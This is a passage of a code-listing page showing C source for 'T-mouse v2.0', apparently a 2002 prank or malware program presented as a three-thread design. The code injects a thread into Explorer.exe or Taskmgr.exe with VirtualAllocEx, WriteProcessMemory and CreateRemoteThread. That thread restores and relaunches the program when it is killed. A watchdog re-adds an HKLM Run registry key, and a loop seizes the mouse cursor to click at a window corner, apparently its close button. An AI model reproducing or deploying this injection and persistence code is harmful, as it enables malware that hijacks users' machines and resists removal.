📄 浅析三线程程序开发思路与实现.txt
字号:
if(ptnew.x<rt.right-15)
ptnew.x+=3;
else if(ptnew.x>rt.right-12)
ptnew.x-=3;
if(ptnew.y<rt.top+12)
ptnew.y+=3;
else if(ptnew.y>rt.top+15)
ptnew.y-=3;
SetCursorPos(ptnew.x,ptnew.y);
if((ptnew.x>=rt.right-15) && (ptnew.x<=rt.right-12)
&& (ptnew.y>=rt.top+12) && (ptnew.y<=rt.top+15)
&& (_tcslen(title)!=0))
{
mouse_event(MOUSEEVENTF_LEFTDOWN,ptnew.x,ptnew.y,0,0);
mouse_event(MOUSEEVENTF_LEFTUP,ptnew.x,ptnew.y,0,0);
}
Sleep(1);
}
getche();
return 0;
}
DWORD processtopid(TCHAR *processname)
{
DWORD lpidprocesses[1024],cbneeded,cprocesses;
HANDLE hprocess;
HMODULE hmodule;
UINT i;
TCHAR normalname[MAX_PATH]=_T("UnknownProcess");
if(!EnumProcesses(lpidprocesses,sizeof(lpidprocesses),&cbneeded))
{
_tprintf(_T("EnumProcesses Error: %d\n"),GetLastError());
return -1;
}
cprocesses=cbneeded/sizeof(DWORD);
for(i=0;i<cprocesses;i++)
{
hprocess=OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE,lpidprocesses[i]);
if(hprocess)
{
if(EnumProcessModules(hprocess,&hmodule,sizeof(hmodule),&cbneeded))
{
GetModuleBaseName(hprocess,hmodule,normalname,sizeof(normalname));
if(!_tcsicmp(normalname,processname))
{
CloseHandle(hprocess);
return (lpidprocesses[i]);
}
}
}
}
CloseHandle(hprocess);
return 0;
}
HANDLE createremote(PTSTR ctname,PTSTR ckname)
{
HANDLE ethread;
HANDLE rphandle;
TCHAR name[2][15];
TCHAR *remotethr;
TCHAR *remotepar;
DWORD remotepid;
int cb;
int signal;
HINSTANCE hkernel32;
REMOTEPARAMETER rp;
_tcscpy(name[0],_T("Explorer.exe"));
_tcscpy(name[1],_T("Taskmgr.exe"));
signal=1;
while(1)
{
remotepid=processtopid(name[(++signal)%2]);
if(remotepid==-1)
{
return NULL;
}
else if(remotepid==0)
{
OutputDebugString(_T("Remote Process isn't running\n"));
Sleep(1000);
continue;
}
rphandle=OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE,remotepid);
if(rphandle==NULL)
{
Sleep(1000);
continue;
}
else
{
break;
}
}
cb=sizeof(TCHAR)*4*1024;
remotethr=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(remotethr==NULL)
{
_tprintf(_T("VirtualAllocEx for Thread Error: %d\n"),GetLastError());
CloseHandle(rphandle);
return NULL;
}
if(WriteProcessMemory(rphandle,remotethr,(LPVOID)remote,cb,NULL)==FALSE)
{
_tprintf(_T("WriteProcessMemory for Thread Error: %d\n"),GetLastError());
CloseHandle(rphandle);
return NULL;
}
{
memset(&rp,0,sizeof(rp));
rp.rpmousepid=GetCurrentProcessId();
_tcscpy(rp.rpstring,_T("i am in remote process\n"));
_tcscpy(rp.rpcferror,_T("CopyFile Error\n"));
_tcscpy(rp.rpfcerror,_T("FindClose Error\n"));
_tcscpy(rp.rpffferror,_T("FindFirstFile Error\n"));
_tcscpy(rp.rpoperror,_T("OpenProcess Error\n"));
_tcscpy(rp.rpweerror,_T("WinExec Error\n"));
_tcscpy(rp.rpwfsosignal,_T("i am out of remote process\n"));
_tcscpy(rp.rptname,ctname);
_tcscpy(rp.rpkname,ckname);
WideCharToMultiByte(CP_ACP,0,ctname,-1,rp.rpwinexecname,_tcslen(ctname),NULL,NULL);
hkernel32=GetModuleHandle(_T("kernel32.dll"));
rp.rpoutputdebugstring=(DWORD)GetProcAddress(hkernel32,"OutputDebugStringW");
rp.rpopenprocess=(DWORD)GetProcAddress(hkernel32,"OpenProcess");
rp.rpwaitforsingleobject=(DWORD)GetProcAddress(hkernel32,"WaitForSingleObject");
rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileW");
rp.rpcopyfile=(DWORD)GetProcAddress(hkernel32,"CopyFileW");
rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
rp.rpwinexec=(DWORD)GetProcAddress(hkernel32,"WinExec");
}
cb=sizeof(TCHAR)*sizeof(rp);
remotepar=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
if(remotepar==NULL)
{
_tprintf(_T("VirtualAllocEx for Parameter Error: %d\n"),GetLastError());
CloseHandle(rphandle);
return NULL;
}
if(WriteProcessMemory(rphandle,remotepar,(LPVOID)&rp,cb,NULL)==FALSE)
{
_tprintf(_T("WriteProcessMemory for Parameter Error: %d\n"),GetLastError());
CloseHandle(rphandle);
return NULL;
}
ethread=CreateRemoteThread(rphandle,NULL,0,(LPTHREAD_START_ROUTINE)remotethr,(LPVOID)remotepar,0,NULL);
if(ethread==NULL)
{
_tprintf(_T("CreateRemoteThread Error: %d\n"),GetLastError());
CloseHandle(rphandle);
return NULL;
}
return ethread;
}
void start()
{
_tprintf(_T("---[ T-mouse v2.0, by TOo2y ]---\n"));
_tprintf(_T("---[ E-mail: TOo2y@safechina.net ]---\n"));
_tprintf(_T("---[ HomePage: www.safechina.net ]---\n"));
_tprintf(_T("---[ Date: 11-27-2002 ]---\n\n"));
return;
}
DWORD WINAPI watch(LPVOID pvparam)
{
HANDLE wethread=(HANDLE)pvparam;
DWORD exitcode;
HKEY hkey;
TCHAR sname[MAX_PATH];
TCHAR wtname[MAX_PATH];
TCHAR wkname[MAX_PATH];
TCHAR lpdata[MAX_PATH];
LPCTSTR rgspath=_T("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
DWORD type=REG_SZ;
DWORD dwbuflen=MAX_PATH;
int ret;
if((ret=GetSystemDirectory(sname,MAX_PATH))==0)
{
_tprintf(_T("GetSystemDirectory in watch Error: %d\n"),GetLastError());
return -1;
}
_tcscpy(wtname,sname);
_tcscat(wtname,name1);
_tcscpy(wkname,sname);
_tcscat(wkname,name2);
while(1)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);
if(ret!=ERROR_SUCCESS)
{
_tprintf(_T("RegOpenKeyEx for KEY_QUERY_VALUE Error: %d\n"),GetLastError());
break;
}
ret=RegQueryValueEx(hkey,_T("T-mouse"),NULL,NULL,(LPBYTE)lpdata,&dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
if(ret!=ERROR_SUCCESS)
{
_tprintf(_T("RegOpenKeyEx for KEY_WRITE Error: %d\n"),GetLastError());
break;
}
ret=RegSetValueEx(hkey,_T("T-mouse"),NULL,type,(const byte *)wtname,dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
_tprintf(_T("RegSetValueEx Error: %d\n"),GetLastError());
break;
}
}
GetExitCodeThread(wethread,&exitcode);
if(exitcode!=STILL_ACTIVE)
{
wethread=createremote(wtname,wkname);
}
Sleep(1000);
}
return 0;
}
DWORD WINAPI remote(LPVOID pvparam)
{
PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
typedef VOID (WINAPI *EOutputDebugString)(LPCTSTR);
typedef HANDLE (WINAPI *EOpenProcess)(DWORD, BOOL, DWORD);
typedef DWORD (WINAPI *EWaitForSingleObject)(HANDLE, DWORD);
typedef HANDLE (WINAPI *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
typedef BOOL (WINAPI *ECopyFile)(LPCTSTR, LPCTSTR, BOOL);
typedef BOOL (WINAPI *EFindClose)(HANDLE);
typedef UINT (WINAPI *EWinExec)(LPCSTR, UINT);
EOutputDebugString tOutputDebugString;
EOpenProcess tOpenProcess;
EWaitForSingleObject tWaitForSingleObject;
EFindFirstFile tFindFirstFile;
ECopyFile tCopyFile;
EFindClose tFindClose;
EWinExec tWinExec;
tOutputDebugString=(EOutputDebugString)erp->rpoutputdebugstring;
tOpenProcess=(EOpenProcess)erp->rpopenprocess;
tWaitForSingleObject=(EWaitForSingleObject)erp->rpwaitforsingleobject;
tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
tCopyFile=(ECopyFile)erp->rpcopyfile;
tFindClose=(EFindClose)erp->rpfindclose;
tWinExec=(EWinExec)erp->rpwinexec;
tOutputDebugString(erp->rpstring);
erp->rpprocesshandle=tOpenProcess(PROCESS_ALL_ACCESS,FALSE,erp->rpmousepid);
if(erp->rpprocesshandle==NULL)
{
tOutputDebugString(erp->rpoperror);
return -1;
}
tWaitForSingleObject(erp->rpprocesshandle,INFINITE);
tOutputDebugString(erp->rpwfsosignal);
erp->rpfilehandle=tFindFirstFile(erp->rptname,&erp->rpfdata);
if(erp->rpfilehandle==INVALID_HANDLE_VALUE)
{
tOutputDebugString(erp->rpffferror);
if(!tCopyFile(erp->rpkname,erp->rptname,TRUE))
{
tOutputDebugString(erp->rpcferror);
return -1;
}
}
if(!tFindClose(erp->rpfilehandle))
{
tOutputDebugString(erp->rpfcerror);
return -1;
}
if(tWinExec(erp->rpwinexecname, 0)<=31)
{
tOutputDebugString(erp->rpweerror);
return -1;
}
return 0;
} ⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -